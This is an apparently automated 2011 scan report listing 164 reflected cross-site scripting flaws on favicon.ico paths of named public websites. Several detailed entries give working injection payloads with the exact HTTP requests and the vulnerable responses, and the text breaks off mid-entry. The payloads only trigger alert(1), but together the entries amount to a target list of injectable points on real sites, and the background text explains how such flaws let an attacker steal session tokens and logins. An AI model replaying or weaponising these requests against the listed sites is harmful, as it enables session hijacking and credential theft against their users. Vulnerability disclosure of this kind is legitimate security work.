XSS, DORK Report, 3-31-2011, Cross Site Scripting, CWE-79, CAPEC-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Thu Mar 31 18:33:35 CDT 2011.


XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Loading

1. Cross-site scripting (reflected)

1.1. http://www.4shared.com/favicon.ico [REST URL parameter 1]

1.2. http://www.4shared.com/favicon.ico [REST URL parameter 1]

1.3. http://www.aboutus.org/favicon.ico [REST URL parameter 1]

1.4. http://www.affinity.com/favicon.ico [REST URL parameter 1]

1.5. http://www.allvoices.com/favicon.ico [REST URL parameter 1]

1.6. http://www.answerbag.com/favicon.ico [REST URL parameter 1]

1.7. http://www.arestravel.com/favicon.ico [REST URL parameter 1]

1.8. http://www.askthebuilder.com/favicon.ico [REST URL parameter 1]

1.9. http://www.beyond.com/favicon.ico [REST URL parameter 1]

1.10. http://www.biblegateway.com/favicon.ico [REST URL parameter 1]

1.11. http://www.biblegateway.com/favicon.ico [REST URL parameter 1]

1.12. http://www.blackplanet.com/favicon.ico [REST URL parameter 1]

1.13. http://www.bleepingcomputer.com/favicon.ico [REST URL parameter 1]

1.14. http://www.bleepingcomputer.com/favicon.ico [REST URL parameter 1]

1.15. http://www.blurtit.com/favicon.ico [REST URL parameter 1]

1.16. http://www.blurtit.com/favicon.ico [REST URL parameter 1]

1.17. http://www.booking.com/favicon.ico [REST URL parameter 1]

1.18. http://www.buzzillions.com/favicon.ico [REST URL parameter 1]

1.19. http://www.buzzillions.com/favicon.ico [REST URL parameter 1]

1.20. http://www.buzzillions.com/favicon.ico [REST URL parameter 1]

1.21. http://www.calorie-count.com/favicon.ico [REST URL parameter 1]

1.22. http://www.calorie-count.com/favicon.ico [name of an arbitrarily supplied request parameter]

1.23. http://www.caringbridge.org/favicon.ico [REST URL parameter 1]

1.24. http://www.cigna.com/favicon.ico [REST URL parameter 1]

1.25. http://www.cliffsnotes.com/favicon.ico [REST URL parameter 1]

1.26. http://www.colbertnation.com/favicon.ico [REST URL parameter 1]

1.27. http://www.computerhope.com/favicon.ico [REST URL parameter 1]

1.28. http://www.convertunits.com/favicon.ico [REST URL parameter 1]

1.29. http://www.craveonline.com/favicon.ico [REST URL parameter 1]

1.30. http://www.craveonline.com/favicon.ico [REST URL parameter 1]

1.31. http://www.csmonitor.com/favicon.ico [REST URL parameter 1]

1.32. http://www.derkeiler.com/favicon.ico [REST URL parameter 1]

1.33. http://www.derkeiler.com/favicon.ico [REST URL parameter 1]

1.34. http://www.docstoc.com/favicon.ico [REST URL parameter 1]

1.35. http://www.domaintools.com/favicon.ico [REST URL parameter 1]

1.36. http://www.driverside.com/favicon.ico [REST URL parameter 1]

1.37. http://www.dummies.com/favicon.ico [REST URL parameter 1]

1.38. http://www.ecnext.com/favicon.ico [REST URL parameter 1]

1.39. http://www.ecnext.com/favicon.ico [REST URL parameter 1]

1.40. http://www.ecnext.com/favicon.ico [name of an arbitrarily supplied request parameter]

1.41. http://www.ecnext.com/favicon.ico [name of an arbitrarily supplied request parameter]

1.42. http://www.education.com/favicon.ico [REST URL parameter 1]

1.43. http://www.egotastic.com/favicon.ico [REST URL parameter 1]

1.44. http://www.egotastic.com/favicon.ico [REST URL parameter 1]

1.45. http://www.elyrics.net/favicon.ico [REST URL parameter 1]

1.46. http://www.elyricsworld.com/favicon.ico [REST URL parameter 1]

1.47. http://www.elyricsworld.com/favicon.ico [REST URL parameter 1]

1.48. http://www.elyricsworld.com/favicon.ico [name of an arbitrarily supplied request parameter]

1.49. http://www.elyricsworld.com/favicon.ico [name of an arbitrarily supplied request parameter]

1.50. http://www.everydayhealth.com/favicon.ico [REST URL parameter 1]

1.51. http://www.favecrafts.com/favicon.ico [REST URL parameter 1]

1.52. http://www.foodandwine.com/favicon.ico [REST URL parameter 1]

1.53. http://www.foreignpolicy.com/favicon.ico [REST URL parameter 1]

1.54. http://www.foreignpolicy.com/favicon.ico [REST URL parameter 1]

1.55. http://www.gamespot.com/favicon.ico [REST URL parameter 1]

1.56. http://www.gamestop.com/favicon.ico [REST URL parameter 1]

1.57. http://www.gather.com/favicon.ico [REST URL parameter 1]

1.58. http://www.gather.com/favicon.ico [REST URL parameter 1]

1.59. http://www.geni.com/favicon.ico [REST URL parameter 1]

1.60. http://www.glogster.com/favicon.ico [REST URL parameter 1]

1.61. http://www.good.is/favicon.ico [REST URL parameter 1]

1.62. http://www.gourmandia.com/favicon.ico [REST URL parameter 1]

1.63. http://www.healthline.com/favicon.ico [REST URL parameter 1]

1.64. http://www.hollywood.com/favicon.ico [REST URL parameter 1]

1.65. http://www.inc.com/favicon.ico [REST URL parameter 1]

1.66. http://www.instructables.com/favicon.ico [REST URL parameter 1]

1.67. http://www.intellicast.com/favicon.ico [REST URL parameter 1]

1.68. http://www.kaboose.com/favicon.ico [REST URL parameter 1]

1.69. http://www.letssingit.com/favicon.ico [REST URL parameter 1]

1.70. http://www.letssingit.com/favicon.ico [REST URL parameter 1]

1.71. http://www.logitech.com/favicon.ico [REST URL parameter 1]

1.72. http://www.logitech.com/favicon.ico [REST URL parameter 1]

1.73. http://www.lulu.com/favicon.ico [REST URL parameter 1]

1.74. http://www.mainstreet.com/favicon.ico [REST URL parameter 1]

1.75. http://www.manta.com/favicon.ico [REST URL parameter 1]

1.76. http://www.manta.com/favicon.ico [REST URL parameter 1]

1.77. http://www.manta.com/favicon.ico [name of an arbitrarily supplied request parameter]

1.78. http://www.manta.com/favicon.ico [name of an arbitrarily supplied request parameter]

1.79. http://www.mediaite.com/favicon.ico [REST URL parameter 1]

1.80. http://www.minyanville.com/favicon.ico [REST URL parameter 1]

1.81. http://www.mnn.com/favicon.ico [REST URL parameter 1]

1.82. http://www.motime.com/favicon.ico [REST URL parameter 1]

1.83. http://www.motime.com/favicon.ico [REST URL parameter 1]

1.84. http://www.mp3raid.com/favicon.ico [REST URL parameter 1]

1.85. http://www.mp3raid.com/favicon.ico [REST URL parameter 1]

1.86. http://www.mycricket.com/favicon.ico [REST URL parameter 1]

1.87. http://www.mylifetime.com/favicon.ico [REST URL parameter 1]

1.88. http://www.mylifetime.com/favicon.ico [REST URL parameter 1]

1.89. http://www.neoseeker.com/favicon.ico [REST URL parameter 1]

1.90. http://www.nydailynews.com/favicon.ico [REST URL parameter 1]

1.91. http://www.oodle.com/favicon.ico [REST URL parameter 1]

1.92. http://www.oodle.com/favicon.ico [REST URL parameter 1]

1.93. http://www.pepboys.com/favicon.ico [REST URL parameter 1]

1.94. http://www.pissedconsumer.com/favicon.ico [REST URL parameter 1]

1.95. http://www.pissedconsumer.com/favicon.ico [name of an arbitrarily supplied request parameter]

1.96. http://www.pronto.com/favicon.ico [REST URL parameter 1]

1.97. http://www.rent.com/favicon.ico [REST URL parameter 1]

1.98. http://www.rent.com/favicon.ico [REST URL parameter 1]

1.99. http://www.responsibilityproject.com/favicon.ico [REST URL parameter 1]

1.100. http://www.responsibilityproject.com/favicon.ico [REST URL parameter 1]

1.101. http://www.reverbnation.com/favicon.ico [REST URL parameter 1]

1.102. http://www.schoolfusion.us/favicon.ico [REST URL parameter 1]

1.103. http://www.sciencedirect.com/favicon.ico [REST URL parameter 1]

1.104. http://www.shangri-la.com/favicon.ico [REST URL parameter 1]

1.105. http://www.shopcompanion.com/favicon.ico [REST URL parameter 1]

1.106. http://www.sixapart.com/favicon.ico [REST URL parameter 1]

1.107. http://www.smarter.com/favicon.ico [REST URL parameter 1]

1.108. http://www.soft82.com/favicon.ico [REST URL parameter 1]

1.109. http://www.songarea.com/favicon.ico [REST URL parameter 1]

1.110. http://www.songfacts.com/favicon.ico [REST URL parameter 1]

1.111. http://www.songfacts.com/favicon.ico [REST URL parameter 1]

1.112. http://www.songmeanings.net/favicon.ico [REST URL parameter 1]

1.113. http://www.songmeanings.net/favicon.ico [REST URL parameter 1]

1.114. http://www.spike.com/favicon.ico [REST URL parameter 1]

1.115. http://www.supercheats.com/favicon.ico [REST URL parameter 1]

1.116. http://www.tarot.com/favicon.ico [REST URL parameter 1]

1.117. http://www.tarot.com/favicon.ico [REST URL parameter 1]

1.118. http://www.tarot.com/favicon.ico [REST URL parameter 1]

1.119. http://www.textbooks.com/favicon.ico [REST URL parameter 1]

1.120. http://www.thecarconnection.com/favicon.ico [REST URL parameter 1]

1.121. http://www.thecarconnection.com/favicon.ico [REST URL parameter 1]

1.122. http://www.thecarconnection.com/favicon.ico [REST URL parameter 1]

1.123. http://www.thedailybeast.com/favicon.ico [REST URL parameter 1]

1.124. http://www.thedailyshow.com/favicon.ico [REST URL parameter 1]

1.125. http://www.thehollywoodgossip.com/favicon.ico [REST URL parameter 1]

1.126. http://www.thestar.com/favicon.ico [REST URL parameter 1]

1.127. http://www.thirdage.com/favicon.ico [REST URL parameter 1]

1.128. http://www.thomasnet.com/favicon.ico [REST URL parameter 1]

1.129. http://www.totalprosports.com/favicon.ico [REST URL parameter 1]

1.130. http://www.tradekey.com/favicon.ico [REST URL parameter 1]

1.131. http://www.trails.com/favicon.ico [REST URL parameter 1]

1.132. http://www.travelpod.com/favicon.ico [REST URL parameter 1]

1.133. http://www.tvfanatic.com/favicon.ico [REST URL parameter 1]

1.134. http://www.ucla.edu/favicon.ico [REST URL parameter 1]

1.135. http://www.uscellular.com/favicon.ico [REST URL parameter 1]

1.136. http://www.uscellular.com/favicon.ico [REST URL parameter 1]

1.137. http://www.videojug.com/favicon.ico [REST URL parameter 1]

1.138. http://www.videosurf.com/favicon.ico [REST URL parameter 1]

1.139. http://www.vt.edu/favicon.ico [REST URL parameter 1]

1.140. http://www.walletpop.com/favicon.ico [REST URL parameter 1]

1.141. http://www.washington.edu/favicon.ico [REST URL parameter 1]

1.142. http://www.whattoexpect.com/favicon.ico [REST URL parameter 1]

1.143. http://www.wisc.edu/favicon.ico [REST URL parameter 1]

1.144. http://www.wisc.edu/favicon.ico [REST URL parameter 1]

1.145. http://www.wisc.edu/favicon.ico [REST URL parameter 1]

1.146. http://www.wowhead.com/favicon.ico [REST URL parameter 1]

1.147. http://www.wowhead.com/favicon.ico [REST URL parameter 1]

1.148. http://www.yakaz.com/favicon.ico [REST URL parameter 1]

1.149. http://www.yellowpages.com/favicon.ico [REST URL parameter 1]

1.150. http://www.yellowpages.com/favicon.ico [REST URL parameter 1]

1.151. http://www.yourdictionary.com/favicon.ico [REST URL parameter 1]

1.152. http://www.eset.com/favicon.ico [Referer HTTP header]

1.153. http://www.azstarnet.com/favicon.ico [REST URL parameter 1]

1.154. http://www.canada.com/favicon.ico [REST URL parameter 1]

1.155. http://www.searchwarp.com/favicon.ico [REST URL parameter 1]

1.156. http://www.searchwarp.com/favicon.ico [name of an arbitrarily supplied request parameter]

1.157. http://www.shop.com/favicon.ico [name of an arbitrarily supplied request parameter]

1.158. http://www.shop.com/favicon.ico [name of an arbitrarily supplied request parameter]

1.159. http://www.shopcompanion.com/favicon.ico [name of an arbitrarily supplied request parameter]

1.160. http://www.shopcompanion.com/favicon.ico [name of an arbitrarily supplied request parameter]

1.161. http://www.tangle.com/favicon.ico [name of an arbitrarily supplied request parameter]

1.162. http://www.tangle.com/favicon.ico [name of an arbitrarily supplied request parameter]

1.163. http://www.townhall.com/favicon.ico [name of an arbitrarily supplied request parameter]

1.164. http://www.townhall.com/favicon.ico [name of an arbitrarily supplied request parameter]



1. Cross-site scripting (reflected)
There are 164 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.4shared.com/favicon.ico [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc7e6"-alert(1)-"cb2ddf1c526 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.icofc7e6"-alert(1)-"cb2ddf1c526 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.4shared.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 /favicon.icofc7e6"-alert(1)-"cb2ddf1c526
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2A367A43C7DBE45B4AAFCB2D5CF62F16.dc330; Path=/
Content-Type: text/html;charset=UTF-8
Date: Thu, 31 Mar 2011 20:09:19 GMT
Content-Length: 41151


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/favicon.icofc7e6"-alert(1)-"cb2ddf1c526";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.2. http://www.4shared.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb4c9'-alert(1)-'fcf1ddfae63 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.icocb4c9'-alert(1)-'fcf1ddfae63 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.4shared.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 /favicon.icocb4c9'-alert(1)-'fcf1ddfae63
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=10FEC046B792F2F8FEBDE199FAD38969.dc330; Path=/
Content-Type: text/html;charset=UTF-8
Date: Thu, 31 Mar 2011 20:09:21 GMT
Content-Length: 41152


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
eof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/favicon.icocb4c9'-alert(1)-'fcf1ddfae63',
remember : false


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.3. http://www.aboutus.org/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aboutus.org
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 617ce"><script>alert(1)</script>5721ca53270 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico617ce"><script>alert(1)</script>5721ca53270 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aboutus.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.1
ETag: "069f8e26f4ce534683def84ec6c4a345"
X-Runtime: 87
Content-Length: 13398
Set-Cookie: logged_in=false; path=/
Set-Cookie: _aboutus_session_key=BAh7BzoPc2Vzc2lvbl9pZCIlOGQ1Mjk5MDA0MGY1MzE2ODM3YjRkOGMyNzU4ZjVmMWQiDWFiX2luZGV4aQGG--dcf70436b3e91485b31c1bc4a44295fcd5070276; path=/; expires=Sat, 31-Mar-2012 20:34:32 GMT; HttpOnly
Cache-Control: max-age=0, public
X-Au-Rails-Sha1: 10daa1f
Server: nginx/0.8.54 + Phusion Passenger 3.0.1 (mod_rails/mod_rack)
X-node-id: columbia


<!doctype html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta name="description" content="Favicon.Ico617ce"><Script>Alert(1)</Script>5721ca53270 - Learn from the experts and community at AboutUs.org" />
...[SNIP]...

1.4. http://www.affinity.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.affinity.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f9ff1<script>alert(1)</script>2128e304c54 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icof9ff1<script>alert(1)</script>2128e304c54 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.affinity.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 21:28:22 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_gzip/1.3.26.1a mod_ssl/2.8.22 OpenSSL/0.9.7e
Content-Type: text/html; charset=iso-8859-1
Content-Length: 965

<html>
<head>
   <base href='http://www.affinity.com/' />    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
   <title>
       404 Error | Affinity Advertiser & Publisher Solutions
...[SNIP]...
<br/>
       Page - http://www.www.affinity.com/favicon.icof9ff1<script>alert(1)</script>2128e304c54 - does not exist.<br/>
...[SNIP]...

1.5. http://www.allvoices.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.allvoices.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4666b"><script>alert(1)</script>4f3eee2b900 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4666b"><script>alert(1)</script>4f3eee2b900 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.allvoices.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:26:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5
X-QueryCount: 2
X-Runtime: 18ms
X-QueryRuntime: 0.00150
Cache-Control: no-cache
Set-Cookie: _T_=1r7g0xsg71cepiish4ygml0vp; path=/; expires=Fri, 01 Apr 2011 08:26:12 GMT
Set-Cookie: page_url=http%3A%2F%2Fwww.allvoices.com%2Ffavicon.ico4666b%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4f3eee2b900; path=/
Set-Cookie: masala_session_id=1da81968e9479dfa5989cea6b2a72db5; path=/
Content-Length: 27741
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<meta property="og:url" content="http://www.allvoices.com/favicon.ico4666b"><script>alert(1)</script>4f3eee2b900"/>
...[SNIP]...

1.6. http://www.answerbag.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.answerbag.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 39150'><script>alert(1)</script>bb8f65a6a8e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico39150'><script>alert(1)</script>bb8f65a6a8e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.answerbag.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Thu, 31 Mar 2011 20:09:12 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8d PHP/5.2.5
X-Powered-By: PHP/5.2.5
Set-Cookie: PHPSESSID=2780dfdaa7695292057ae761f0c5fc7c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en-us

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org
...[SNIP]...
<meta property='og:url' content='http://www.answerbag.com/favicon.ico39150'><script>alert(1)</script>bb8f65a6a8e' />
...[SNIP]...

1.7. http://www.arestravel.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.arestravel.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79e5d"><a>a582c202136 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico79e5d"><a>a582c202136 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.arestravel.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 22:01:58 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS660d0822cbffc91a8b785ea2588b16b3=cc0i53vs8mgk2pki74e6ibejm7; expires=Sun, 24 Apr 2011 01:35:18 GMT; path=/; domain=.arestravel.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Thu, 31 Mar 2011 22:01:58 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13918

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr">

<head>
<tit
...[SNIP]...
<body id="p_favicon.ico79e5d"><a>a582c202136" >
...[SNIP]...

1.8. http://www.askthebuilder.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.askthebuilder.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d6db6<script>alert(1)</script>76020ab0f37 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icod6db6<script>alert(1)</script>76020ab0f37 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.askthebuilder.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 21:52:32 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 18527

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
   
...[SNIP]...
<blockquote>
/favicon.icod6db6<script>alert(1)</script>76020ab0f37 </blockquote>
...[SNIP]...

1.9. http://www.beyond.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beyond.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 95434%20style%3dx%3aexpression(alert(1))%206530d067f4a was submitted in the REST URL parameter 1. This input was echoed as 95434 style=x:expression(alert(1)) 6530d067f4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /favicon.ico95434%20style%3dx%3aexpression(alert(1))%206530d067f4a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.beyond.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404
Cache-Control: private
Content-Length: 30035
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: PORTAL=PARTNER=Beyond%2Ecom&NEWUSERSITE=&DIDIPLKUP=Y&USERSTATE=TEXAS&HTTPREFERRER=&USERGID=325445231166499895&USERCOUNTRY=US; expires=Fri, 30-Mar-2012 04:00:00 GMT; path=/
Set-Cookie: Visitor=NewSessionID=ED4078D2%2D95B1%2D478E%2D81DF%2D5AFA86C4B74B; path=/
Set-Cookie: ASPSESSIONIDQASQTDDS=EJPHOLBCFLJKOBEEPCCONHHG; path=/
X-Powered-By: ASP.NET
Date: Thu, 31 Mar 2011 20:48:56 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equ
...[SNIP]...
6124&r_partnersitename=Beyond.com&t_pgid=576059256379436823&t_sn=/common/error/checkurl.asp&t_httph=www.beyond.com&t_httpurl=/common/error/checkurl.asp&t_httpqs=404;http://www.beyond.com:80/favicon.ico95434 style=x:expression(alert(1)) 6530d067f4a&t_sgid=251852311224464691&t_ws=COLO-WEB01&t_ugid=325445231166499895&f_ip=173.193.214.243&ud=>
...[SNIP]...

1.10. http://www.biblegateway.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.biblegateway.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24317"><script>alert(1)</script>121a4b3f1d5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico24317"><script>alert(1)</script>121a4b3f1d5 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.biblegateway.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.54
Date: Thu, 31 Mar 2011 20:28:12 GMT
